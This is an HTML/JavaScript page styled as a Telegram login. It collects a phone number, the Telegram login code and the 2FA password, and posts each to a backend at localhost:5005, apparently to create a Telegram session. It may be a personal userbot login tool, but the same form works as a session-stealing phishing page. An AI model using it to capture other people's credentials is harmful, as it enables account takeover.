<!DOCTYPE html>
<html lang="ru">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Telegram Авторизация</title>
  <style>
    * {
      box-sizing: border-box;
    }

    body {
      margin: 0;
      padding: 0;
      font-family: "Segoe UI", sans-serif;
      background: linear-gradient(to bottom right, #1e1e2f, #121218);
      color: white;
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
      min-height: 100vh;
      padding: 15px;
    }

    .box {
      background: rgba(255, 255, 255, 0.05);
      backdrop-filter: blur(12px);
      border-radius: 20px;
      box-shadow: 0 0 25px rgba(0, 255, 255, 0.15);
      padding: 25px;
      width: 100%;
      max-width: 380px;
    }

    h2 {
      text-align: center;
      margin-bottom: 20px;
      font-weight: 500;
      font-size: 22px;
    }

    input {
      width: 100%;
      padding: 14px;
      margin: 10px 0;
      border: none;
      border-radius: 12px;
      background: rgba(255, 255, 255, 0.1);
      color: white;
      font-size: 16px;
    }

    button {
      width: 100%;
      padding: 14px;
      margin-top: 10px;
      border: none;
      border-radius: 12px;
      background: linear-gradient(135deg, #0088cc, #00c3ff);
      color: white;
      font-size: 16px;
      font-weight: bold;
      cursor: pointer;
      display: flex;
      align-items: center;
      justify-content: center;
      transition: background 0.3s ease;
      box-shadow: 0 0 15px rgba(0, 195, 255, 0.3);
    }

    button:hover {
      background: linear-gradient(135deg, #00aaff, #00e0ff);
    }

    button:disabled {
      opacity: 0.6;
      cursor: not-allowed;
    }

    .hidden {
      display: none;
    }

    #status {
      font-size: 14px;
      text-align: center;
      color: #ccc;
      margin-top: 12px;
    }

    .footer {
      margin-top: 30px;
      font-size: 13px;
      color: #888;
      text-align: center;
      opacity: 0.7;
    }

    @media (max-width: 480px) {
      .box {
        padding: 20px;
      }

      h2 {
        font-size: 20px;
      }

      input, button {
        font-size: 15px;
      }
    }
  </style>
</head>
<body>
  <div class="box">
    <h2>Telegram Вход</h2>

    <!-- Шаг 1: Ввод номера -->
<div id="step-phone">
  <input type="tel" id="phone" placeholder="+1234567890" />
  <button id="sendPhone">
    <svg xmlns="http://www.w3.org/2000/svg" fill="white" viewBox="0 0 240 240" width="20" height="20" style="margin-right:8px;">
      <path d="M120 0C53.73 0 0 53.73 0 120s53.73 120 120 120 120-53.73 120-120S186.27 0 120 0zm58.59 80.65-19.66 92.64c-1.49 6.64-5.4 8.29-10.96 5.17l-30.27-22.33-14.6 14.06c-1.61 1.61-2.96 2.96-6.05 2.96l2.17-30.77 55.96-50.5c2.43-2.17-.52-3.38-3.77-1.21l-69.23 43.53-29.81-9.3c-6.48-2.03-6.64-6.48 1.35-9.59l116.6-45.01c5.4-1.96 10.09 1.21 8.4 9.35z"/>
    </svg>
    Отправить номер
  </button>
</div>

<!-- Шаг 2: Ввод кода -->
<div id="step-code" class="hidden">
  <input type="text" id="code" placeholder="Код из Telegram" />
  <button id="sendCode">
    <svg xmlns="http://www.w3.org/2000/svg" fill="white" viewBox="0 0 240 240" width="20" height="20" style="margin-right:8px;">
      <path d="M120 0C53.73 0 0 53.73 0 120s53.73 120 120 120 120-53.73 120-120S186.27 0 120 0zm58.59 80.65-19.66 92.64c-1.49 6.64-5.4 8.29-10.96 5.17l-30.27-22.33-14.6 14.06c-1.61 1.61-2.96 2.96-6.05 2.96l2.17-30.77 55.96-50.5c2.43-2.17-.52-3.38-3.77-1.21l-69.23 43.53-29.81-9.3c-6.48-2.03-6.64-6.48 1.35-9.59l116.6-45.01c5.4-1.96 10.09 1.21 8.4 9.35z"/>
    </svg>
    Отправить код
  </button>
</div>

<!-- Шаг 3: Ввод пароля -->
<div id="step-password" class="hidden">
  <input type="password" id="password" placeholder="Пароль 2FA" />
  <button id="sendPassword">
    <svg xmlns="http://www.w3.org/2000/svg" fill="white" viewBox="0 0 240 240" width="20" height="20" style="margin-right:8px;">
      <path d="M120 0C53.73 0 0 53.73 0 120s53.73 120 120 120 120-53.73 120-120S186.27 0 120 0zm58.59 80.65-19.66 92.64c-1.49 6.64-5.4 8.29-10.96 5.17l-30.27-22.33-14.6 14.06c-1.61 1.61-2.96 2.96-6.05 2.96l2.17-30.77 55.96-50.5c2.43-2.17-.52-3.38-3.77-1.21l-69.23 43.53-29.81-9.3c-6.48-2.03-6.64-6.48 1.35-9.59l116.6-45.01c5.4-1.96 10.09 1.21 8.4 9.35z"/>
    </svg>
    Отправить пароль
  </button>
</div>
    <div id="status">Ожидается ввод номера...</div>
  </div>

  <div class="footer">Создано @TOWKHM</div>

  <script>
    const stepPhone = document.getElementById('step-phone');
    const stepCode = document.getElementById('step-code');
    const stepPassword = document.getElementById('step-password');

    const phoneInput = document.getElementById('phone');
    const codeInput = document.getElementById('code');
    const passwordInput = document.getElementById('password');

    const sendPhone = document.getElementById('sendPhone');
    const sendCode = document.getElementById('sendCode');
    const sendPassword = document.getElementById('sendPassword');

    const status = document.getElementById('status');

    let currentPhone = '';
    let phoneCodeHash = '';

    const showStep = (step) => {
      stepPhone.classList.add('hidden');
      stepCode.classList.add('hidden');
      stepPassword.classList.add('hidden');

      if (step === 'phone') stepPhone.classList.remove('hidden');
      if (step === 'code') stepCode.classList.remove('hidden');
      if (step === 'password') stepPassword.classList.remove('hidden');
    };

    const updateStatus = (msg) => {
      status.textContent = msg;
    };

    const postJSON = async (endpoint, data) => {
      try {
        const res = await fetch(`http://localhost:5005${endpoint}`, {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify(data),
        });
        return await res.json();
      } catch (err) {
        console.error(err);
        updateStatus('❌ Ошибка соединения с сервером');
        return null;
      }
    };

    sendPhone.onclick = async () => {
      const phone = phoneInput.value.trim();
      if (!phone.startsWith('+')) return updateStatus('❗ Номер должен начинаться с +');

      sendPhone.disabled = true;
      updateStatus('📨 Отправка номера...');

      const result = await postJSON('/start_login', { phone });
      sendPhone.disabled = false;

      if (result?.status === 'code_sent') {
        currentPhone = phone;
        phoneCodeHash = result.phone_code_hash;
        showStep('code');
        updateStatus('📬 Введите код из Telegram');
      } else if (result?.status === 'already_authorized') {
        updateStatus('✅ Уже авторизованы');
      } else {
        updateStatus('❌ Ошибка: ' + (result?.error || 'Неизвестно'));
      }
    };

    sendCode.onclick = async () => {
      const code = codeInput.value.trim();
      if (!code) return updateStatus('❗ Введите код из Telegram');

      sendCode.disabled = true;
      updateStatus('🔄 Отправка кода...');

      const result = await postJSON('/submit_code', {
        phone: currentPhone,
        code,
        phone_code_hash: phoneCodeHash,
      });
      sendCode.disabled = false;

      if (result?.status === 'logged_in') {
        updateStatus('✅ Успешный вход!');
      } else if (result?.status === 'password_required') {
        showStep('password');
        updateStatus('🔐 Требуется пароль 2FA');
      } else {
        updateStatus('❌ Ошибка: ' + (result?.error || 'Неизвестно'));
      }
    };

    sendPassword.onclick = async () => {
      const password = passwordInput.value.trim();
      if (!password) return updateStatus('❗ Введите 2FA пароль');

      sendPassword.disabled = true;
      updateStatus('🔐 Проверка пароля...');

      const result = await postJSON('/submit_password', {
        phone: currentPhone,
        password,
      });

      sendPassword.disabled = false;

      if (result?.status === 'logged_in') {
        updateStatus('✅ Вход с 2FA выполнен!');
      } else {
        updateStatus('❌ Ошибка 2FA: ' + (result?.error || 'Неизвестно'));
      }
    };

    showStep('phone');
  </script>
</body>
</html>

